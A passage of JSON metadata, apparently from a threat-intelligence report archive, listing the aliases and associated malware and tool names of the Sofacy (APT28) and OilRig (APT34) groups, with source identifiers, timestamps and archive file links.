"ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null }, { "id": "b6436f7b-6012-4969-aed1-d440e2e8b238", "created_at": "2022-10-25T16:07:23.91517Z", "updated_at": "2026-04-10T02:00:04.788408Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "APT 34", "ATK 40", "Chrysene", "Cobalt Gypsy", "Crambus", "DEV-0861", "EUROPIUM", "Earth Simnavaz", "Evasive Serpens", "G0049", "Hazel Sandstorm", "Helix Kitten", "IRN2", "ITG13", "Scarred Manticore", "Storm-0861", "TA452", "Twisted Kitten", "UNC1860", "Yellow Maero" ], "source_name": "ETDA:OilRig", "tools": [ "AMATIAS", "Agent Drable", "Agent Injector", "AgentDrable", "Alma Communicator", "BONDUPDATER", "CACTUSPIPE", "Clayslide", "CypherRat", "DNSExfitrator", "DNSpionage", "DROPSHOT", "DistTrack", "DropperBackdoor", "Fox Panel", "GREYSTUFF", "GoogleDrive RAT", "HighShell", "HyperShell", "ISMAgent", "ISMDoor", "ISMInjector", "Jason", "Karkoff", "LIONTAIL", "LOLBAS", "LOLBins", "LONGWATCH", "LaZagne", "Living off the Land", "MailDropper", "Mimikatz", "MrPerfectInstaller", "OILYFACE", "OopsIE", "POWBAT", "POWRUNER", "Plink", "Poison Frog", "PowerExchange", "PsList", "PuTTY Link", "QUADAGENT", "RDAT", "RGDoor", "SEASHARPEE", "Saitama", "Saitama Backdoor", "Shamoon", "SideTwist", "SpyNote", "SpyNote RAT", "StoneDrill", "TONEDEAF", "TONEDEAF 2.0", "ThreeDollars", "TwoFace", "VALUEVAULT", "Webmask", "WinRAR", "ZEROCLEAR", "ZeroCleare", "certutil", "certutil.exe" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434871, "ts_updated_at": 1775792270, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/85717db1d1ee235746fab628aecc468a0ca8cd8a.pdf", "text": "https://archive.orkl.eu/85717db1d1ee235746fab628aecc468a0ca8cd8a.txt", "img": "https://archive.orkl.eu/85717db1d1ee235746fab628aecc468a0ca8cd8a.jpg" } }